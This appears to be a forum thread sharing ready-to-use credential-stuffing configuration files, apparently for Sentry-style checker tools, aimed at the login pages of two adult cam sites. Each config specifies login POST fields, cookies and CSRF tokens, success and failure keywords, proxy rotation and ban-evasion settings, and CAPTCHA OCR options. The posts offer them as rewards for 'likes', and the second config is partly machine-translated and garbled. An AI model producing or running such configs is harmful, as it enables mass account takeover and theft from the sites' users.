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  4. Click on the Like button to respect labor. [hide][Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 DFB0F725C8A828D3758166D73505CEDA=0 C12F5C0ABF4299CE8B058AB951D665FF=0 1BE5FC4FC5DAE32DF07824F78587ADB5=519 [settings] SiteURL=https://tr.bongacams.com/ Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 ComboMode=0 EmailFilter=0 EmailMode=0 UsernameStart=6 UsernameEnd=8 InvalidChars= AllowedChars= Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordStart=6 PasswordEnd=8 PasswordInvalidChars= PasswordAllowedChars= PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=5 BanWindowWidth=1 BanWindowRatio=10 BanWindowProxies=10 blnNoProxies=0 HTTPHeader= |Accept: */*|Referer: https://tr.bongacams.com/|User-Agent: |Host: |Pragma: no-cache|Connection: keep-alive| RequestMethod=2 Referer=2 POSTData=log_in%5Busername%5D=&log_in%5Bpassword%5D=&security_log_additional_info=&log_in%5Bremember%5D=1 [Fake] AfterFP=1 blnSuccess=0 SuccessRetries=3 blnProcessErrors=0 blnCompleteNot=1 EnableConHits=0 ConHits=0 FollowRedirect=1 EnableConLength=0 ConLength=-1 SourceTags=1 UserField=0 HTTPFollow=1 blnForbToOK=0 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 [Keywords] EnableHeaderSuccess=1 EnableHeaderBan=0 EnableHeaderFail=1 EnableHeaderRetry=0 HeaderSuccess=||account-info";"logout"> HeaderBan= HeaderFail=forgot-password">;Şifrenizi mi unuttunuz? HeaderRetry= EnableGlobalSourceRetry=0 EnableSourceSuccess=1 EnableSourceBan=0 EnableSourceFail=1 EnableSourceRetry=0 SourceSuccess=account-info";points_count">;"logout"> SourceBan= SourceFail=forgot-password">;Şifrenizi mi unuttunuz? SourceRetry= [Form] IAParse=0 LoginPostData= LoginMethod=1 LoginHeader=0 Action=https://tr.bongacams.com/login Username=log_in%5Busername%5D Password=log_in%5Bpassword%5D Email= AddData=security_log_additional_info=&log_in%5Bremember%5D=1 CustomData= NoIndex= Cookie=BONGA_VU=1; Max-Age=86400; warning18=%5B%22tr_TR%22%5D; ts_type2=1; ts_type=deleted; bonga20120608=cf8gi83mmpcoif2n41h9jfvap4 IAction=-1 IUser=-1 IPass=-1 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl=https://tr.bongacams.com/members/account/membership RedPostData= RedKeys=||account-info"; ||account-info";||points_count">;||points_count">;||"logout">;||"logout"> DataDesc=DoĞaN.TrTeam.&>&Tokens.> CaptureParsingCode=ng" alt=|/|#00|#00|0|#00|#00|0&:|<|#00|#00|0|#00|#00|0&>|<|#00|#00|0|#00|#00|0 RefreshSession=0 RefreshCookie=1 FormHeader=0 AjaxHeader=0 RedHeader=0 IAMethod=2 POSTMethod=2 RedMethod=1 ImageAfterAjax=0 blnBasic=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables= PostElements2= RedURL= [OCR] OCRMode=0 URLMode=0 ImageURLID=|| Captcha= OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnCharTable=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnThreeImages=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=0 Threshold=0 Noise=1 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=10 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng[/hide] Click on the Like button to respect labor.
  5. Click on the Like button to respect labor. [hide][Wordlist] UserIndex = 1 PassIndex = 2 EmailIndex = 0 417EAEDE1E4710B1B6B4FB7BC875D26C = 442 [Ayarlar] SiteURL = https: //tr.chaturbate.com/auth/login/ Timeout = 20 WaitBot = 0 ResolveHost = 0 ComboFil = 0 ComboMo = 0 ComboMoFilFil = 0 = 0 EmailMode = 0 UsernameStart = 6 UsernameEnd = 8 InvalidChars = AllowChars = Harfler = 0 Rakamlar = 0 Harf = 0 Alpha = 0 Email = 0 LowerUpper = 0 LetterDigit = 0 SpeciaChar = 0 PasswordStart = 6 PasswordEnd = 8 PasswordInvalidChars = PasswordAllowedChars = PasswordLetters = 0 PasswordInvalidChars = 0 PasswordDigits = 0 PasswordAlpha = 0 PasswordEmail = 0 PasswordLowerUpper = 0 PasswordLetterDigit = 0 PasswordSpeciaChar = 0 ProxyActivate = 10 ProxyRatio = 4 ProxyCombo = 0 waittime = 5 BanWindowWidth = 1 BanWindowRatio = 10 BanWindowProxies = 10 blnNoProxies = 0 HttpHeader = | Kabul et: * / * | Referans: https://tr.chaturbate.com/auth/login/|Kullanıcı-Ajan : | Sunucu: | Pragma: no-cache | Bağlantı: canlı tutmak | RequestMethod = 2 Yönlendiren = 2 postData = username = & şifre = & csrfmiddlewaretoken = 5exEhxs44cBODsfVqRkhwJ6LgpvClcXS & AfterFP = 1 blnSuccess = 0 SuccessRetries = 3 blnProcessErrors = 0 blnCompleteNot = 1 EnableConHits = 0 ConHits = 0 FollowRedirect = 1 EnableConLength = 0 ConLength = -1 SourceTags = 1 UserField = 0 HTTPFollow = 1 blnForbToOK = 0 ForbToOkLength = 1000 blnBadOcrCode = 0 BadOcrCodeRetries = 3 [Anahtar Sözcükler] EnableHeaderSuccess = 0 EnableHeaderBan = 0 EnableHeaderFail = 0 EnableHeaderRetry = 0 HeaderSuccess = HeaderBan = HeaderFail = HeaderRetry = 0 HeaderSuccess = HeaderBan = HeaderFail = HeaderRetry = EnableGlobalSourceRetry = 1 EnableSourceSuccess = 1 EnableGlobalSourceRetry = 1 EnableSourceFail = 1 EnableSourceRetry = 0 SourceSuccess = OTURUMU KAPATMAK; PROFILIM SourceBan = SourceFail = Lütfen aşağıdaki hataları düzeltin. SourceRetry = [Form] IAParse = 0 LoginPostData = LoginMethod = 1 LoginHeader = 0 Eylem = https: //tr.chaturbate.com/auth/login/? Next = / auth / login / Username = kullanıcı adı Şifre = şifre E-posta = AddData = csrfmiddlewaretoken = 5exEhxs44cBODsfVqRkhwJ6LgpvClcXS ve aşağıdaki =% 2Fauth% 2Flogin% 2F CustomData = nOINDEX = Tanımlama = affkey = "eJyrVipSslJQUqoFAAwfAk0 ="; Max-Yaş = 2592000; csrftoken = 5exEhxs44cBODsfVqRkhwJ6LgpvClcXS IAction = -1 Kullanıcısı = -1 IPass = -1 IEmail = -2 ICaptcha = -1 ReqReferer = ReqCookie = AjaxURL = AjaxPOSTData = AjaxData = AjaxParsingCode = RefData = ParsingCode = FormRedirectUrl = RedPostData = RedKeys = DataDesc = By SpiDeR / Hesaplama ve Hesaplama İşlemleri <% | | # 00 | 0 & t '> | <| # 00 | # 00 | 0 | # 00 | # 00 | 0 & e> | <| # 00 | # 00 | 0 | # 00 | # 00 | 0 & e> | <| # 00 | # 00 | 0 | # 00 | # 00 | 0 RefreshSession = 0 RefreshCookie = 0 FormHeader = 0 AjaxHeader = 0 RedHeader = 0 IAMethod = 2 POSTMethod = 2 RedMethod = 1 ImageAfterAjax = 0 blnBasic = 0 FollowRedirectsOnIA = 0 FollowRedirectsOnRed = 1 [Ajax] Değişkenler = PostElements2 = RedURL = [OCR] OCRMode = 0 URLMode = 0 ImageURLID = || Kaptan = OCRKey = RefreshCaptcha = 0 blnContrast = 0 blnBrightness = 0 blnSaturation = 0 blnThreshold = 0 blnInvert = 0 blnNoise = 0 blnIsolate = 0 blnResize = 0 blnBorder = 0 blnCharExtract = 0 blnRemoveColors = 0 blnStringFilter = 0 blnLetter = 1 blnDigits = 1 blnBlur = 0 blnReconstruct = 0 blnLower = 0 blnUpper = 0 blnRemoveLines = 0 blnMultiChar = 0 blnCharTable = 0 blnPalette = 0 blnCharResize = 0 blnCharSubExtraction = 0 blnThreeImages = 0 blnGif = 0 blnCompute = 0 blnBorderPre = 0 Kontrast = 0 Parlaklık = 0 Doygunluk = 0 Eşik = 0 Gürültü = 1 izole = 1 , yeniden boyutlandırma = 2 BorderLeft = 0 BorderTop = 0 BorderRight = 0 BorderBottom = 0 CharExtractMinBlack = 0 CharExtractMaxBlack = 1 CharExtractMinWidth = 1 CharRotateMax = 0 CharRotateSteps = 5 MINLENGTH = 1 MaxLength = 10 BlurRadius = 1 CharExtractMaxWidth = 33 CharWidthMinBlack = 2 CharSpace = 1 Aralık = 0 InvertDensity = 0 InvertLength = 20 LineCurvatureMax = 4 LineWidthMax = 13 CharResize = 1 CharHeight = 13 GifStart = 2 GifOffset = 2 BorderLeftPre = 0 BorderTopPre = 0 BorderRightPre = 0 BorderBottomPre = 0 CharBorderH = 5 CharBorderV = 5 CharRotateBorder = 5 CharExtractMinHeight = 1 VerticalRejoin = 30 CharExclude = specialChars = Renk = Renk2 = Satır = Minimum Uzunluk: 2, Maksimum Genişlik: 5, Yatay Dil = eng[/hide] Click on the Like button to respect labor.
  6. I brought it up in the wrong place.Sorry....You can delete it.
  7. web0master


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